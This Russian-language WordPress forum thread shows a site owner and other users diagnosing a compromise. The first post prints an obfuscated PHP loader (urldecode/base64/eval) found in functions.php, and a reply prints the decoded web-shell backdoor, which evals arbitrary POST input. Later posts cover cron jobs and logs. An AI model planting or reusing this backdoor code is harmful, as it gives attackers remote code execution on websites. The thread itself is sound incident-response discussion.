Введите часть искомого слова, названия или фразы...
↑ ↓
  1. Новые темы озаглавленные с маленькой буквы - удаляются без предупреждения!
  2. Вопрос без рабочей ссылки на проблему считается риторическим. Без ссылки и скриншота - провокацией!

Function.php странный код

Тема в разделе "Вопросы, советы и доработки.", создана пользователем Macstuff, 23 сен 2015.

  1. Macstuff

    Macstuff

    Сообщения:
    36
    Симпатии:
    0
    Баллы:
    6
    Доброго времени суток.
    Последние дни просто немеренное кол-во регистраций ботов с yahoo ящиков...
    Начал искать решение и нашел вариант с переименованием wp-login.php и там было указано вставить код в function.php. В начале файла я увидел странный код, дешифровать его не смог, после удаления страницы не открывались вовсе, просто белый экран.
    Что это?
    Спасибо

    PHP:
     $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
     
  2. Archibald

    Archibald

    Сообщения:
    18
    Симпатии:
    3
    Баллы:
    3
    Это троян.
    Части кода не хватает, того что в скобках
    base64_decode(strtr(substr($O0O000,$OO0000*2),substr($O0O000,$OO0000,$OO0000),substr($O0O000,0,$OO0000)));
     
  3. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    вот это тебе предлагают вставить
    PHP:
    <?php
    $fukq 
    = @$_GET['fukq'];
    if(
    $fukq == 't'){
      echo(@eval(
    $_POST['fuckyou4321']));
      exit;
      }
    echo 
    apiRequest();
    function 
    apiRequest(){
        if(@
    $_GET['op'] == 'check')
            {
             return 
    "connectjbmoveisok";
             exit();
            }
    }
    ?>
     
  4. rikitiki

    rikitiki Местный

    Сообщения:
    749
    Симпатии:
    184
    Баллы:
    43
    А как этот код действует? Сам functions.php запускает или начинает действовать, когда админ или посетитель на сайт заходят, активируя тем самым functions.php?
     
  5. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    нет сайт выполнит любой php код , который ему пришлют. То есть теоретически кто-то извне может полностью распоряжаться твоей учетной записью у хостера
     
  6. Macstuff

    Macstuff

    Сообщения:
    36
    Симпатии:
    0
    Баллы:
    6
    Код удалил, но сейчас появилась другая проблема. Каким то образом появляются записи без текста, например, photoshop c4 crack... админ один, пароль сменил
     
  7. searchingman

    searchingman Местный

    Сообщения:
    1.634
    Симпатии:
    553
    Баллы:
    113
    Не все удалено.
    Попробуйте полечиться с помощью сканера AI-Bolit.
     
  8. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    Дело в том, что как правило код такой предназначен для внедрения чего-то еще. Например модернизация существующих скриптов, добавления своих файлов тд. Так что без ревизии файлов сайта не обойтись. Неплохо для начала логи апача посмотреть сопоставив со времени добавления записи. Посмотреть какие задачи у wp-cron прописаны.
     
  9. Macstuff

    Macstuff

    Сообщения:
    36
    Симпатии:
    0
    Баллы:
    6
    Вот что удалось найти через cpanel, а как понять что это за задания?

    Код:
    Host: 2a03:c980::1:20:16
    /wp-cron.php?doing_wp_cron=1445218820.8918900489807128906250
        Http Code: 200    Date: Oct 19 04:40:20    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445222212.1818981170654296875000
        Http Code: 200    Date: Oct 19 05:36:52    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445224000.7439529895782470703125
        Http Code: 200    Date: Oct 19 06:06:40    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445226476.7103641033172607421875
        Http Code: 200    Date: Oct 19 06:47:56    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445230362.6335949897766113281250
        Http Code: 200    Date: Oct 19 07:52:42    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445230685.1213068962097167968750
        Http Code: 200    Date: Oct 19 07:58:05    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445231859.2687690258026123046875
        Http Code: 200    Date: Oct 19 08:17:39    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445232822.1764910221099853515625
        Http Code: 200    Date: Oct 19 08:33:42    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445236321.2021179199218750000000
        Http Code: 200    Date: Oct 19 09:32:01    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?doing_wp_cron=1445236859.4292368888854980468750
        Http Code: 200    Date: Oct 19 09:40:59    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
        Http Code: 200    Date: Oct 19 10:02:48    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
    /wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
        Http Code: 200    Date: Oct 19 10:28:51    Http Version: HTTP/1.1    Size in Bytes: 0
        Referer: -
        Agent: WordPress/4.2.5; http://prettysimple.ru
     
  10. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    Это выполнение заданий wp-cron, которые зафиксировались логом веб сервера. Это есть у всех, у кого принудительно wp-cron не отключен. Важно узнать что это за задания.
     
  11. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    Я не знаю, есть ли отдельный плагин для просмотра cron задач. У меня стоит плагин рассылок mailpress там есть инструмент для просмотра запланированных задач и их удаления .

    хотя похоже есть http://art-storona.ru/dl/wp-admin/plugin-install.php?tab=search&s=cron
     
    Последнее редактирование: 19 окт 2015
  12. Macstuff

    Macstuff

    Сообщения:
    36
    Симпатии:
    0
    Баллы:
    6
    С помощью Advanced Cron Manager вытащил список заданий.

    wp_cache_gc_watcher
    hourly In 40 минут
    19.10.2015 14:32:42 Execute
    wp_scheduled_auto_draft_delete

    daily In 5 часов
    19.10.2015 18:58:26 Execute
    wp_maybe_auto_update

    twicedaily In 6 часов
    19.10.2015 19:58:00 Execute
    woocommerce_tracker_send_event
    daily In 7 часов
    19.10.2015 21:21:17 Execute
    woocommerce_cleanup_sessions
    twicedaily In 7 часов
    19.10.2015 21:21:17 Execute
    wp_cache_full_preload_hook
    single In 9 часов
    19.10.2015 23:18:41 Execute
    updraft_backup
    daily In 11 часов
    20.10.2015 00:56:15 Execute
    wp_version_check

    twicedaily In 12 часов
    20.10.2015 01:47:31 Execute
    wp_update_plugins

    twicedaily In 12 часов
    20.10.2015 01:47:31 Execute
    wp_update_themes

    twicedaily In 12 часов
    20.10.2015 01:47:31 Execute
    execute_periodic_drobox_backup
    daily In 13 часов
    20.10.2015 03:00:00 Execute
    wp_cache_gc
    daily In 13 часов
    20.10.2015 03:00:00 Execute
    woocommerce_scheduled_sales
    daily In 16 часов
    20.10.2015 06:00:00 Execute
    wp_scheduled_delete

    daily In 24 часа
    20.10.2015 13:47:35 Execute
    wp_cache_full_preload_hook
    single In 1 месяц
    30.11.2015 19:24:04 Execute
     
  13. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    да вроде ничего подозрительного. Но с другой стороны зловредный код может выполняться и внутри полезного задания.
     
  14. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    вот какие-то странные обращения к крону. опять же без анализа файлов сайта не обойтись
    /wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
    /wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
     
  15. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
    Последнее редактирование: 19 окт 2015
  16. joy66

    joy66

    Сообщения:
    76
    Симпатии:
    13
    Баллы:
    8
  17. Macstuff

    Macstuff

    Сообщения:
    36
    Симпатии:
    0
    Баллы:
    6
    Когда я увидел wysija я так и подумал, но это странно, он стоит уже год... Может конечно его взломали, попробую отключить его